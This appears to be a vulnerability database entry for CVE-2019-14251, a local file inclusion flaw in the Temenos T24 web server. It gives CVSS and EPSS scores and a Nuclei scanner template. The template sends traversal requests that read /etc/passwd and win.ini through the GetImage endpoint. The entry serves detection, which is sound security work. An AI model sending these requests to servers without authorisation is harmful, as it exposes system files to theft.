Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-14251
HistoryJul 07, 2022 - 9:58 p.m.

T24 Web Server - Local File Inclusion

2022-07-0721:58:09
ProjectDiscovery
github.com

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.017 Low

EPSS

Percentile

87.7%

T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.

id: CVE-2019-14251

info:
  name: T24 Web Server - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.
  reference:
    - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
    - https://vuldb.com/?id.146815
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14251
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14251
    cwe-id: CWE-22
    epss-score: 0.02152
    epss-percentile: 0.89306
    cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: temenos
    product: t24
  tags: cve,cve2019,temenos,lfi,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402200b1a2b0df86f4fec836a803c9f979b0943ec0c3786627bc42d0f31fd7fc03bca02204c1aa89ad91c4c776e3708d673869c99f7312d707e3b67d7c6209ef4841a62d1:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.017 Low

EPSS

Percentile

87.7%

Related for NUCLEI:CVE-2019-14251